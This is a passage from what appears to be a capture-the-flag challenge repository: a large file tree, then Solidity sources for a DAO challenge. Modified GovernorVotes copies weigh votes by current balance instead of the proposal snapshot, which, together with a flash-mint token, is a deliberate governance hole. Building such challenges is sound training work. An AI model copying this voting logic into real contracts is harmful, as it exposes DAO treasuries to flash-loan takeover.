├── .gitignore ├── README.md ├── blockchain ├── AAADAO │ ├── attachments │ │ ├── Deploy.sol │ │ ├── Gov.sol │ │ ├── Token.sol │ │ ├── access │ │ │ ├── AccessControl.sol │ │ │ ├── AccessControlCrossChain.sol │ │ │ ├── AccessControlEnumerable.sol │ │ │ ├── IAccessControl.sol │ │ │ ├── IAccessControlEnumerable.sol │ │ │ └── Ownable.sol │ │ ├── governance │ │ │ ├── Governor.sol │ │ │ ├── GovernorVotes.sol │ │ │ ├── IGovernor.sol │ │ │ ├── TimelockController.sol │ │ │ ├── compatibility │ │ │ │ ├── GovernorCompatibilityBravo.sol │ │ │ │ └── IGovernorCompatibilityBravo.sol │ │ │ ├── extensions │ │ │ │ ├── GovernorCountingSimple.sol │ │ │ │ ├── GovernorPreventLateQuorum.sol │ │ │ │ ├── GovernorProposalThreshold.sol │ │ │ │ ├── GovernorSettings.sol │ │ │ │ ├── GovernorTimelockCompound.sol │ │ │ │ ├── GovernorTimelockControl.sol │ │ │ │ ├── GovernorVotes.sol │ │ │ │ ├── GovernorVotesComp.sol │ │ │ │ ├── GovernorVotesQuorumFraction.sol │ │ │ │ └── IGovernorTimelock.sol │ │ │ └── utils │ │ │ │ ├── IVotes.sol │ │ │ │ └── Votes.sol │ │ ├── interfaces │ │ │ ├── IERC1155.sol │ │ │ ├── IERC1155MetadataURI.sol │ │ │ ├── IERC1155Receiver.sol │ │ │ ├── IERC1271.sol │ │ │ ├── IERC1363.sol │ │ │ ├── IERC1363Receiver.sol │ │ │ ├── IERC1363Spender.sol │ │ │ ├── IERC165.sol │ │ │ ├── IERC1820Implementer.sol │ │ │ ├── IERC1820Registry.sol │ │ │ ├── IERC20.sol │ │ │ ├── IERC20Metadata.sol │ │ │ ├── IERC2981.sol │ │ │ ├── IERC3156.sol │ │ │ ├── IERC3156FlashBorrower.sol │ │ │ ├── IERC3156FlashLender.sol │ │ │ ├── IERC721.sol │ │ │ ├── IERC721Enumerable.sol │ │ │ ├── IERC721Metadata.sol │ │ │ ├── IERC721Receiver.sol │ │ │ ├── IERC777.sol │ │ │ ├── IERC777Recipient.sol │ │ │ ├── IERC777Sender.sol │ │ │ ├── README.adoc │ │ │ ├── draft-IERC1822.sol │ │ │ └── draft-IERC2612.sol │ │ ├── token │ │ │ ├── ERC1155 │ │ │ │ ├── ERC1155.sol │ │ │ │ ├── IERC1155.sol │ │ │ │ ├── IERC1155Receiver.sol │ │ │ │ ├── README.adoc │ │ │ │ ├── extensions │ │ │ │ │ ├── ERC1155Burnable.sol │ │ │ │ │ ├── 
ERC1155Pausable.sol │ │ │ │ │ ├── ERC1155Supply.sol │ │ │ │ │ ├── ERC1155URIStorage.sol │ │ │ │ │ └── IERC1155MetadataURI.sol │ │ │ │ ├── presets │ │ │ │ │ ├── ERC1155PresetMinterPauser.sol │ │ │ │ │ └── README.md │ │ │ │ └── utils │ │ │ │ │ ├── ERC1155Holder.sol │ │ │ │ │ └── ERC1155Receiver.sol │ │ │ ├── ERC20 │ │ │ │ ├── ERC20.sol │ │ │ │ ├── IERC20.sol │ │ │ │ ├── README.adoc │ │ │ │ ├── extensions │ │ │ │ │ ├── ERC20Burnable.sol │ │ │ │ │ ├── ERC20Capped.sol │ │ │ │ │ ├── ERC20FlashMint.sol │ │ │ │ │ ├── ERC20Pausable.sol │ │ │ │ │ ├── ERC20Snapshot.sol │ │ │ │ │ ├── ERC20Votes.sol │ │ │ │ │ ├── ERC20VotesComp.sol │ │ │ │ │ ├── ERC20Wrapper.sol │ │ │ │ │ ├── IERC20Metadata.sol │ │ │ │ │ ├── draft-ERC20Permit.sol │ │ │ │ │ └── draft-IERC20Permit.sol │ │ │ │ ├── presets │ │ │ │ │ ├── ERC20PresetFixedSupply.sol │ │ │ │ │ ├── ERC20PresetMinterPauser.sol │ │ │ │ │ └── README.md │ │ │ │ └── utils │ │ │ │ │ ├── SafeERC20.sol │ │ │ │ │ └── TokenTimelock.sol │ │ │ ├── ERC721 │ │ │ │ ├── ERC721.sol │ │ │ │ ├── IERC721.sol │ │ │ │ ├── IERC721Receiver.sol │ │ │ │ ├── README.adoc │ │ │ │ ├── extensions │ │ │ │ │ ├── ERC721Burnable.sol │ │ │ │ │ ├── ERC721Enumerable.sol │ │ │ │ │ ├── ERC721Pausable.sol │ │ │ │ │ ├── ERC721Royalty.sol │ │ │ │ │ ├── ERC721URIStorage.sol │ │ │ │ │ ├── IERC721Enumerable.sol │ │ │ │ │ ├── IERC721Metadata.sol │ │ │ │ │ └── draft-ERC721Votes.sol │ │ │ │ ├── presets │ │ │ │ │ ├── ERC721PresetMinterPauserAutoId.sol │ │ │ │ │ └── README.md │ │ │ │ └── utils │ │ │ │ │ └── ERC721Holder.sol │ │ │ ├── ERC777 │ │ │ │ ├── ERC777.sol │ │ │ │ ├── IERC777.sol │ │ │ │ ├── IERC777Recipient.sol │ │ │ │ ├── IERC777Sender.sol │ │ │ │ ├── README.adoc │ │ │ │ └── presets │ │ │ │ │ └── ERC777PresetFixedSupply.sol │ │ │ └── common │ │ │ │ ├── ERC2981.sol │ │ │ │ └── README.adoc │ │ └── utils │ │ │ ├── Address.sol │ │ │ ├── Arrays.sol │ │ │ ├── Base64.sol │ │ │ ├── Checkpoints.sol │ │ │ ├── Context.sol │ │ │ ├── Counters.sol │ │ │ ├── Create2.sol │ │ │ ├── 
Multicall.sol │ │ │ ├── README.adoc │ │ │ ├── StorageSlot.sol │ │ │ ├── Strings.sol │ │ │ ├── Timers.sol │ │ │ ├── cryptography │ │ │ ├── ECDSA.sol │ │ │ ├── MerkleProof.sol │ │ │ ├── SignatureChecker.sol │ │ │ └── draft-EIP712.sol │ │ │ ├── escrow │ │ │ ├── ConditionalEscrow.sol │ │ │ ├── Escrow.sol │ │ │ └── RefundEscrow.sol │ │ │ ├── introspection │ │ │ ├── ERC165.sol │ │ │ ├── ERC165Checker.sol │ │ │ ├── ERC165Storage.sol │ │ │ ├── ERC1820Implementer.sol │ │ │ ├── IERC165.sol │ │ │ ├── IERC1820Implementer.sol │ │ │ └── IERC1820Registry.sol │ │ │ ├── math │ │ │ ├── Math.sol │ │ │ ├── SafeCast.sol │ │ │ ├── SafeMath.sol │ │ │ ├── SignedMath.sol │ │ │ └── SignedSafeMath.sol │ │ │ └── structs │ │ │ ├── BitMaps.sol │ │ │ ├── DoubleEndedQueue.sol │ │ │ ├── EnumerableMap.sol │ │ │ └── EnumerableSet.sol │ └── exploits │ │ └── PoC.sol ├── Weird_EVM │ ├── README.md │ ├── depoly │ │ ├── Dockerfile │ │ ├── LICENSE │ │ ├── README.md │ │ ├── config │ │ │ ├── genesis.json │ │ │ ├── keystore │ │ │ │ └── UTC--2022-06-21T09-05-49.757555100Z--639a0408b8f8997bb80af7ef373df92c851c7742 │ │ │ └── password.txt │ │ ├── docker-compose.yml │ │ ├── entrypoint.sh │ │ ├── eth-challenge-base │ │ │ ├── .dockerignore │ │ │ ├── .env │ │ │ ├── Dockerfile │ │ │ ├── LICENSE │ │ │ ├── Makefile │ │ │ ├── README.md │ │ │ ├── challenge.yml │ │ │ ├── contracts │ │ │ │ └── Game.json │ │ │ ├── develop.py │ │ │ ├── entrypoint.sh │ │ │ ├── eth_challenge_base │ │ │ │ ├── __init__.py │ │ │ │ ├── action.py │ │ │ │ ├── config.py │ │ │ │ └── utils │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── eth.py │ │ │ │ │ └── pow.py │ │ │ ├── requirements-dev.in │ │ │ ├── requirements-dev.txt │ │ │ ├── requirements.in │ │ │ ├── requirements.txt │ │ │ ├── run.py │ │ │ └── xinetd.sh │ │ ├── nginx.conf │ │ └── njs │ │ │ └── eth-jsonrpc-access.js │ ├── exploits │ │ ├── Game.sol │ │ ├── Solu.sol │ │ ├── bn256.sol │ │ ├── build │ │ │ ├── Game.abi │ │ │ ├── Game.bin │ │ │ ├── Solu.abi │ │ │ └── Solu.bin │ │ ├── ed25519.sol │ │ └── 
solution.py │ ├── hints │ │ ├── README.md │ │ ├── opcodeTableGotter.sh │ │ └── src.zip │ └── patches │ │ ├── 0001-Add-precompiled-and-marshal-opcodes.patch │ │ ├── Instruction.h │ │ └── opcode_dict.py └── bet2loss │ ├── attachments │ ├── Dockerfile │ ├── app.js │ ├── bin │ │ └── www │ ├── contracts │ │ └── BetToken.json │ ├── package-lock.json │ ├── package.json │ ├── public │ │ ├── index.html │ │ ├── javascripts │ │ │ └── index.js │ │ ├── public │ │ │ ├── mdl │ │ │ │ ├── icons.woff2 │ │ │ │ ├── material.indigo-blue.css │ │ │ │ ├── material.js │ │ │ │ └── note.txt │ │ │ ├── uiHelper.css │ │ │ └── uiHelper.js │ │ └── stylesheets │ │ │ └── style.css │ ├── routes │ │ ├── flag.js │ │ ├── index.js │ │ ├── log.js │ │ └── sync.js │ ├── start.sh │ └── views │ │ ├── error.jade │ │ ├── index.jade │ │ └── layout.jade │ └── exploits │ ├── README.md │ ├── solution1 │ ├── bet.sol │ ├── post.py │ └── solve.py │ └── solution2 │ ├── Attacker.cache.json │ ├── Attacker.sol │ ├── BetToken.cache.json │ ├── BetToken.sol │ ├── build │ ├── Attacker.abi │ ├── Attacker.bin │ ├── BetToken.abi │ ├── BetToken.bin │ ├── Callee.abi │ ├── Callee.bin │ ├── Context.abi │ ├── Context.bin │ ├── HasState.abi │ ├── HasState.bin │ ├── Ownable.abi │ └── Ownable.bin │ └── solution.py ├── crypto ├── CryptoNote │ ├── README.md │ ├── attachments │ │ ├── crypto_note.tar.gz │ │ ├── hint1.tar.gz │ │ └── hint2.py │ ├── deploy │ │ ├── Dockerfile │ │ └── src │ │ │ ├── blockchain_service.py │ │ │ ├── deploy.sh │ │ │ ├── ring_signature.py │ │ │ ├── run_instance.sh │ │ │ ├── run_socat.sh │ │ │ └── secret.py │ ├── exploits │ │ ├── blockchain_service.py │ │ ├── bob_public_key_restore.py │ │ ├── carol_public_key_restore.py │ │ ├── range_proof_from_carol.json │ │ ├── ring_signature.py │ │ ├── secret.py │ │ ├── signed_message_from_bob.json │ │ ├── signed_message_verifier.py │ │ ├── solution.py │ │ ├── writeup_en.md │ │ └── writeup_zh.md │ ├── src │ │ ├── Dockerfile │ │ ├── blockchain_service.py │ │ ├── 
bob_public_key_restore.py │ │ ├── bob_signed_generate.py │ │ ├── build_attachment.sh │ │ ├── calc_bn_curve.py │ │ ├── calc_edo_curve.sage │ │ ├── carol_public_key_restore.py │ │ ├── carol_range_proof_generate.py │ │ ├── copy_deploy.sh │ │ ├── copy_solution.sh │ │ ├── deploy.sh │ │ ├── range_proof_from_carol.json │ │ ├── range_proof_verifier.py │ │ ├── ring_signature.py │ │ ├── run_instance.sh │ │ ├── run_socat.sh │ │ ├── secret.py │ │ ├── secret_demo.py │ │ ├── signed_message_from_bob.json │ │ ├── signed_message_verifier.py │ │ ├── solution.py │ │ ├── solution_fake.py │ │ └── solution_poc.py │ ├── writeup_en.md │ └── writeup_zh.md ├── RSA_Leak │ ├── attachments │ │ └── task.py │ └── writeup_en.md ├── casino │ └── attachments │ │ ├── Dockerfile │ │ ├── backend.py │ │ ├── casino.py │ │ ├── main.py │ │ ├── players.py │ │ ├── secret.py │ │ ├── service.conf │ │ └── wrapper ├── impossibleRSA │ └── attachments │ │ ├── flag │ │ ├── public.pem │ │ └── server.py ├── retros │ ├── attachments │ │ └── retros │ └── writeup_en.md └── secure_connection │ ├── attachments │ ├── client.py │ ├── core.py │ └── master.txt │ └── exploits │ ├── client.py │ ├── core.py │ ├── packet.txt │ ├── server.py │ └── solver.py ├── logo.png ├── misc ├── Broken_QRCode │ ├── README.md │ ├── generate.py │ ├── origin.png │ ├── qrcodes │ │ ├── 0.jpg │ │ ├── 1.jpg │ │ ├── 10.jpg │ │ ├── 11.jpg │ │ ├── 2.jpg │ │ ├── 3.jpg │ │ ├── 4.jpg │ │ ├── 5.jpg │ │ ├── 6.jpg │ │ ├── 7.jpg │ │ ├── 8.jpg │ │ └── 9.jpg │ ├── solver.py │ └── 题目.png ├── FFSK │ ├── FFSK_WriteUp.md │ ├── attachments │ │ └── modem.wav │ └── exploits │ │ ├── decode.py │ │ ├── gen.py │ │ └── goertzel.py ├── Man_in_Middle │ ├── attachments │ │ ├── AP.py │ │ ├── Client.py │ │ └── util.py │ └── exploits │ │ ├── AP.py │ │ ├── Client.py │ │ ├── exp.py │ │ ├── key.py │ │ ├── secret.txt │ │ ├── solve.py │ │ └── util.py ├── Signin │ ├── attachments │ │ └── flag │ └── exploits │ │ ├── compress.py │ │ └── decompress.py ├── Weird_rev │ └── 
attachment.tar.gz ├── safer-telegram-bot │ ├── Safer-telegram-bot-{1,2} write up en-US.md │ └── safer-telegram-bot-{1,2} write up.md └── 탕쿠쿠의유혹 │ ├── attachments │ └── 6cv_large.zip │ └── wp │ ├── broken.webp │ ├── diff.jpg │ ├── ori_twi.jpg │ └── writeup.md ├── pwn ├── 2048 │ └── attachments │ │ ├── 2048 │ │ ├── ld-2.31.so │ │ └── libc-2.31.so ├── EasyVM │ ├── attachments │ │ ├── AppJailLauncher.exe │ │ ├── EasyVM.exe │ │ ├── dlls │ │ │ ├── KernelBase.dll │ │ │ ├── kernel32.dll │ │ │ ├── ntdll.dll │ │ │ ├── ucrtbase.dll │ │ │ └── vcruntime140.dll │ │ └── start.ps1 │ └── exploits │ │ ├── EasyVM.c │ │ └── pwn_easyvm.py ├── kkk │ ├── attachments │ │ ├── bzImage │ │ ├── rootfs.img │ │ └── start.sh │ └── exploits │ │ ├── exploit.py │ │ ├── kkk.c │ │ ├── libcrc.so │ │ └── parser.c ├── master_of_dns │ ├── attachments │ │ ├── README.md │ │ ├── dns │ │ ├── dns.conf │ │ └── start.sh │ └── exploits │ │ ├── exp.py │ │ ├── poc.py │ │ └── writeup.md ├── mykvm │ ├── attachments │ │ ├── Dockerfile │ │ ├── bin │ │ │ └── mykvm │ │ ├── ctf.xinetd │ │ └── start.sh │ └── exploits │ │ ├── exp.asm │ │ ├── exp.bin │ │ ├── exp.py │ │ └── readme.txt └── treepwn │ ├── attachments │ ├── ld-2.27.so │ ├── libc-2.27.so │ └── treepwn │ └── exploits │ ├── exploit_remote.py │ └── treepwn.c ├── reverse ├── FunTiger │ └── attachments │ │ └── funTiger ├── Inflated │ └── attachments │ │ └── inflated ├── Nagi_Knows │ ├── attachments │ │ └── nagi.hpp │ └── exploits │ │ ├── nagi.hpp │ │ ├── original.hpp │ │ └── solve.cpp ├── dropper │ ├── attachments │ │ └── dropper.exe │ └── exploits │ │ ├── writeup_cn.md │ │ └── writeup_en.md └── kcov │ └── attachments │ ├── bzImage │ ├── launch.sh │ └── rootfs.cpio.gz └── web ├── ToLeSion ├── attachments │ ├── docker-compose.yml │ └── src │ │ ├── app.py │ │ ├── dockerfile │ │ ├── flag │ │ ├── readflag │ │ ├── requirements.txt │ │ └── start.sh └── exploits │ ├── FTPServer.py │ └── exp.py ├── beWhatYouWannaBe ├── attachments │ ├── docker-compose.yml │ ├── mongodb │ │ 
├── Dockerfile │ │ └── start.sh │ └── src │ │ ├── Dockerfile │ │ └── app │ │ ├── admin.js │ │ ├── app.js │ │ ├── config.js │ │ ├── package.json │ │ └── views │ │ ├── home.ejs │ │ ├── login.ejs │ │ └── register.ejs └── exploits │ └── exploit.html ├── gogogo ├── attachments │ ├── docker-compose.yml │ └── src │ │ ├── Dockerfile │ │ ├── flag │ │ └── hello └── exploits │ ├── exp.py │ ├── hack.c │ └── hack.so ├── myclient ├── attachments │ ├── check_health.sh │ ├── docker-compose.yml │ └── src │ │ ├── Dockerfile │ │ ├── files │ │ ├── index.php │ │ ├── my.cnf │ │ ├── readflag.c │ │ └── start.sh │ │ └── flag └── exploits │ ├── exp.py │ └── hack.so └── poorui ├── attachments ├── docker-compose.yml └── src │ ├── Dockerfile │ └── source │ ├── adminbot.js │ ├── config.js │ ├── flagbot.js │ ├── package.json │ ├── public │ ├── asset-manifest.json │ ├── favicon.ico │ ├── index.html │ ├── logo192.png │ ├── logo512.png │ ├── manifest.json │ ├── robots.txt │ ├── static │ │ ├── css │ │ │ ├── main.66b2f292.css │ │ │ ├── main.c7f24255.css │ │ │ └── main.c7f24255.css.map │ │ └── js │ │ │ ├── main.001408dd.js │ │ │ ├── main.001408dd.js.LICENSE.txt │ │ │ ├── main.001408dd.js.map │ │ │ ├── main.11c0ee5f.js │ │ │ ├── main.11c0ee5f.js.LICENSE.txt │ │ │ ├── main.11c0ee5f.js.map │ │ │ ├── main.279bff5f.js │ │ │ ├── main.279bff5f.js.LICENSE.txt │ │ │ ├── main.279bff5f.js.map │ │ │ ├── main.2caa5c0e.js │ │ │ ├── main.2caa5c0e.js.LICENSE.txt │ │ │ ├── main.2caa5c0e.js.map │ │ │ ├── main.3ade83e5.js │ │ │ ├── main.3ade83e5.js.LICENSE.txt │ │ │ ├── main.495230db.js │ │ │ ├── main.495230db.js.LICENSE.txt │ │ │ ├── main.495230db.js.map │ │ │ ├── main.63b8003b.js │ │ │ ├── main.63b8003b.js.LICENSE.txt │ │ │ ├── main.63b8003b.js.map │ │ │ ├── main.646b89c1.js │ │ │ ├── main.646b89c1.js.LICENSE.txt │ │ │ ├── main.646b89c1.js.map │ │ │ ├── main.6e3bc586.js │ │ │ ├── main.6e3bc586.js.LICENSE.txt │ │ │ ├── main.6e3bc586.js.map │ │ │ ├── main.8724f30b.js │ │ │ ├── main.8724f30b.js.LICENSE.txt │ │ │ ├── 
main.8724f30b.js.map │ │ │ ├── main.96645d85.js │ │ │ ├── main.96645d85.js.LICENSE.txt │ │ │ ├── main.96645d85.js.map │ │ │ ├── main.a9ab67d1.js │ │ │ ├── main.a9ab67d1.js.LICENSE.txt │ │ │ ├── main.a9ab67d1.js.map │ │ │ ├── main.b938e663.js │ │ │ ├── main.b938e663.js.LICENSE.txt │ │ │ ├── main.b938e663.js.map │ │ │ ├── main.bdf21328.js │ │ │ ├── main.bdf21328.js.LICENSE.txt │ │ │ ├── main.bdf21328.js.map │ │ │ ├── main.c7272f4d.js │ │ │ ├── main.c7272f4d.js.LICENSE.txt │ │ │ ├── main.c7272f4d.js.map │ │ │ ├── main.cd218967.js │ │ │ ├── main.cd218967.js.LICENSE.txt │ │ │ ├── main.cd218967.js.map │ │ │ ├── main.d021eda1.js │ │ │ ├── main.d021eda1.js.LICENSE.txt │ │ │ ├── main.f01d71b1.js │ │ │ ├── main.f01d71b1.js.LICENSE.txt │ │ │ ├── main.f01d71b1.js.map │ │ │ ├── main.fcca55c7.js │ │ │ ├── main.fcca55c7.js.LICENSE.txt │ │ │ └── main.fcca55c7.js.map │ └── test.html │ ├── server.js │ ├── start.sh │ ├── tpls │ └── test.tpl │ └── util.js └── exploits └── readme.md /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/Deploy.sol: -------------------------------------------------------------------------------- 1 | import "./Gov.sol"; 2 | import "./Token.sol"; 3 | 4 | contract Deployer{ 5 | 6 | event Deploy(address token, address gov); 7 | 8 | function init() external returns(address,address) { 9 | AAA token=new AAA(); 10 | Gov gov=new Gov(IVotes(token)); 11 | token.transfer(address(gov),token.balanceOf(address(this))); 12 | 13 | emit Deploy(address(token), address(gov)); 14 | 15 | return (address(token),address(gov)); 16 | } 17 | } 18 | 19 | -------------------------------------------------------------------------------- /blockchain/AAADAO/attachments/Gov.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity ^0.8.2; 3 | 
import "./interfaces/IERC20.sol";
import "./governance/Governor.sol";
import "./governance/extensions/GovernorVotes.sol";
import "./governance/extensions/GovernorCountingSimple.sol";
import "./governance/extensions/GovernorVotesQuorumFraction.sol";

/**
 * @dev Governor for the AAA token. Combines {Governor}, {GovernorVotes},
 * {GovernorCountingSimple} and {GovernorVotesQuorumFraction}, and fixes the
 * voting delay, voting period and proposal threshold below.
 *
 * NOTE(review): the GovernorVotes imported above is the copy under
 * governance/extensions/. A second, differently patched copy sits at
 * governance/GovernorVotes.sol. Both return the token's current `getVotes`
 * value and never use the snapshot block they are given.
 */
contract Gov is Governor, GovernorVotes,GovernorCountingSimple,GovernorVotesQuorumFraction{
    // Address of the voting token, recorded by the constructor. Nothing in
    // this contract reads it back.
    address mytoken;

    /**
     * @dev Names the governor "AAAGov", hands `_token` to {GovernorVotes} and
     * passes 4 to {GovernorVotesQuorumFraction} (presumably a quorum of 4% of
     * supply; GovernorVotesQuorumFraction.sol is not shown here, so confirm).
     * @param _token Voting token; its address is also stored in `mytoken`.
     */
    constructor(IVotes _token)
        Governor("AAAGov")
        GovernorVotes(_token)
        GovernorVotesQuorumFraction(4)
    {
        // The call is made by this contract, so it is the governor's own
        // token balance that gets delegated, and it is delegated to the
        // governor itself (assumes ERC20Votes-style delegate(); confirm).
        _token.delegate(address(this));
        mytoken=address(_token);
    }

    /**
     * @dev Voting delay used by this governor.
     *
     * NOTE(review): the original comment read "1 day", but the v4.6-era
     * Governor counts this value in blocks (Governor.sol is not shown;
     * confirm), and 10 blocks pass in minutes. Either the value or the
     * comment is wrong. A delay this short leaves token holders almost no
     * time to react to a new proposal before voting opens.
     */
    function votingDelay() public pure override returns (uint256) {
        return 10; // annotated "1 day" in the original; see NOTE(review) above
    }

    /**
     * @dev Voting period used by this governor. 46027 blocks is about one
     * week only at roughly 13 seconds per block; on a chain with a different
     * block time the real duration differs.
     */
    function votingPeriod() public pure override returns (uint256) {
        return 46027; // 1 week at ~13 s per block
    }

    /**
     * @dev Proposal threshold of zero: this contract sets no minimum voting
     * weight for creating a proposal (how Governor.propose applies the value
     * is not shown here).
     */
    function proposalThreshold() public pure override returns (uint256) {
        return 0;
    }
}

--------------------------------------------------------------------------------
/blockchain/AAADAO/attachments/Token.sol:
--------------------------------------------------------------------------------
pragma solidity ^0.8.0;

import "./token/ERC20/extensions/ERC20Votes.sol";
import "./interfaces/IERC3156FlashBorrower.sol";
import "./interfaces/IERC3156FlashLender.sol";

// Value the borrower's onFlashLoan callback must return for flashLoan to
// continue.
bytes32 constant _RETURN_VALUE = keccak256("ERC3156FlashBorrower.onFlashLoan");

/**
 * @dev ERC20Votes token "AToken" (symbol AAA) with flash-mint style functions
 * named after ERC-3156. IERC3156FlashLender is imported but the contract does
 * not declare that it implements it.
 */
contract AAA is ERC20Votes{
    /// @dev Mints 100000000 whole tokens (scaled by `decimals()`) to the deployer.
    constructor() ERC20("AToken", "AAA") ERC20Permit("AToken") {
        _mint(msg.sender, 100000000 * 10 ** decimals());
    }

    /**
     * @dev Largest amount that can be flash-minted.
     * @param token Token being asked about.
     * @return Remaining headroom up to `type(uint256).max` when `token` is
     * this contract, otherwise 0.
     */
    function maxFlashLoan(address token) public view returns (uint256) {
        return token == address(this) ? type(uint256).max - ERC20.totalSupply() : 0;
    }

    /**
     * @dev Fee for a flash loan of `amount`: 1% (integer division), with a
     * floor of 10 base units. Reverts when `token` is not this contract.
     * @param token Token being borrowed; must be this contract.
     * @param amount Amount being borrowed.
     * @return The fee in base units.
     */
    function flashFee(address token, uint256 amount) public view returns (uint256) {
        require(token == address(this));
        uint fee=amount/100;

        // Minimum fee, so that small loans are not free after rounding down.
        if(fee<10){
            return 10;
        }
        return fee;
    }

    /**
     * @dev Mints `amount` to `receiver`, calls its `onFlashLoan` callback, then
     * burns `amount + fee` from `receiver`.
     *
     * NOTE(review): between the mint and the burn the receiver holds real
     * tokens. Anything that reads balances or current vote weight inside that
     * window sees the borrowed amount, so consumers of this token's voting
     * power should read a past-block snapshot rather than the current value.
     * No reentrancy guard is visible on this function.
     *
     * @param receiver Contract that receives the tokens and the callback.
     * @param token Token to lend; must be this contract (checked through
     * maxFlashLoan and flashFee).
     * @param amount Amount to mint.
     * @param data Opaque data forwarded to the callback.
     * @return Always true when the call does not revert.
     */
    function flashLoan(
        IERC3156FlashBorrower receiver,
        address token,
        uint256 amount,
        bytes calldata data
    ) public returns (bool) {
        require(amount <= maxFlashLoan(token));
        uint256 fee = flashFee(token, amount);
        _mint(address(receiver), amount);
        require(
            receiver.onFlashLoan(msg.sender, token, amount, fee, data) == _RETURN_VALUE
        );
        // The receiver must have approved this token contract for principal
        // plus fee, and must hold that much, or the next two calls revert.
        _spendAllowance(address(receiver), address(this), amount + fee);
        // The fee is burned together with the principal; it is not paid to
        // any account.
        _burn(address(receiver), amount + fee);
        return true;
    }
}


--------------------------------------------------------------------------------
/blockchain/AAADAO/attachments/access/IAccessControlEnumerable.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (access/IAccessControlEnumerable.sol)

pragma solidity ^0.8.0;

import "./IAccessControl.sol";

/**
 * @dev External interface of AccessControlEnumerable declared to support ERC165 detection.
 */
interface IAccessControlEnumerable is IAccessControl {
    /**
     * @dev Returns one of the accounts that have `role`. `index` must be a
     * value between 0 and {getRoleMemberCount}, non-inclusive.
     *
     * Role bearers are not sorted in any particular way, and their ordering may
     * change at any point.
     *
     * WARNING: When using {getRoleMember} and {getRoleMemberCount}, make sure
     * you perform all queries on the same block. See the following
     * https://forum.openzeppelin.com/t/iterating-over-elements-on-enumerableset-in-openzeppelin-contracts/2296[forum post]
     * for more information.
*/
    function getRoleMember(bytes32 role, uint256 index) external view returns (address);

    /**
     * @dev Returns the number of accounts that have `role`. Can be used
     * together with {getRoleMember} to enumerate all bearers of a role.
     */
    function getRoleMemberCount(bytes32 role) external view returns (uint256);
}

--------------------------------------------------------------------------------
/blockchain/AAADAO/attachments/governance/GovernorVotes.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (governance/extensions/GovernorVotes.sol)
// NOTE(review): the header above names governance/extensions/GovernorVotes.sol,
// but this copy lives at governance/GovernorVotes.sol and its _getVotes differs
// from the copy under extensions/. Gov.sol's import list names the extensions/
// copy, not this file.

pragma solidity ^0.8.0;

import "./Governor.sol";
import "./utils/IVotes.sol";

/**
 * @dev Extension of {Governor} for voting weight extraction from an {ERC20Votes} token, or since v4.5 an {ERC721Votes} token.
 *
 * _Available since v4.3._
 */
abstract contract GovernorVotes is Governor {
    // Token the voting weight is read from; fixed at construction.
    IVotes public immutable token;

    /// @param tokenAddress Voting token stored in `token`.
    constructor(IVotes tokenAddress) {
        token = tokenAddress;
    }

    /**
     * Returns `token.getVotes(account)`, and reverts if that value is zero.
     *
     * NOTE(review): upstream documents this hook as reading the token's
     * snapshot mechanism, but this copy never uses `blockNumber`. `getVotes`
     * is the IVotes getter for an account's current weight, so the result
     * follows any balance or delegation change made after the proposal
     * snapshot, including tokens held only for the length of one transaction.
     * A snapshot-safe version would query
     * `token.getPastVotes(account, blockNumber)`.
     */
    function _getVotes(
        address account,
        uint256 blockNumber,
        bytes memory /*params*/
    ) internal view virtual override returns (uint256) {
        // Accounts with no current voting weight are rejected outright.
        require(token.getVotes(account)>0,"fuck you");
        // Current weight, not the weight at `blockNumber`.
        return token.getVotes(account);
    }
}

--------------------------------------------------------------------------------
/blockchain/AAADAO/attachments/governance/extensions/GovernorProposalThreshold.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (governance/extensions/GovernorProposalThreshold.sol)

pragma solidity ^0.8.0;

import "../Governor.sol";

/**
 * @dev Extension of {Governor} for proposal restriction to token holders with a minimum balance.
 *
 * _Available since v4.3._
 * _Deprecated since v4.4._
 */
abstract contract GovernorProposalThreshold is Governor {
    /**
     * @dev Pass-through override: forwards its arguments unchanged to
     * `super.propose` and adds no threshold check of its own.
     */
    function propose(
        address[] memory targets,
        uint256[] memory values,
        bytes[] memory calldatas,
        string memory description
    ) public virtual override returns (uint256) {
        return super.propose(targets, values, calldatas, description);
    }
}

--------------------------------------------------------------------------------
/blockchain/AAADAO/attachments/governance/extensions/GovernorVotes.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (governance/extensions/GovernorVotes.sol)

pragma solidity ^0.8.0;

import "../Governor.sol";
import "../utils/IVotes.sol";

/**
 * @dev Extension of {Governor} for voting weight extraction from an {ERC20Votes} token, or since v4.5 an {ERC721Votes} token.
*
 * _Available since v4.3._
 */
abstract contract GovernorVotes is Governor {
    // Token the voting weight is read from; fixed at construction.
    IVotes public immutable token;

    /// @param tokenAddress Voting token stored in `token`.
    constructor(IVotes tokenAddress) {
        token = tokenAddress;
    }

    /**
     * Returns `token.getVotes(account)`.
     *
     * NOTE(review): upstream documents this hook as reading the token's
     * snapshot mechanism, but this copy never uses `blockNumber`. `getVotes`
     * is the IVotes getter for an account's current weight, so a vote is
     * weighed by whatever the account holds or has been delegated at the
     * moment of the call, not at the proposal snapshot. A snapshot-safe
     * version would query `token.getPastVotes(account, blockNumber)`.
     */
    function _getVotes(
        address account,
        uint256 blockNumber,
        bytes memory /*params*/
    ) internal view virtual override returns (uint256) {
        // Current weight, not the weight at `blockNumber`.
        return token.getVotes(account);
    }
}

--------------------------------------------------------------------------------
/blockchain/AAADAO/attachments/governance/extensions/GovernorVotesComp.sol:
--------------------------------------------------------------------------------
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.6.0) (governance/extensions/GovernorVotesComp.sol)

pragma solidity ^0.8.0;

import "../Governor.sol";
import "../../token/ERC20/extensions/ERC20VotesComp.sol";

/**
 * @dev Extension of {Governor} for voting weight extraction from a Comp token.
 *
 * _Available since v4.3._
 */
abstract contract GovernorVotesComp is Governor {
    // Comp-style token the voting weight is read from; fixed at construction.
    ERC20VotesComp public immutable token;

    /// @param token_ Voting token stored in `token`.
    constructor(ERC20VotesComp token_) {
        token = token_;
    }

    /**
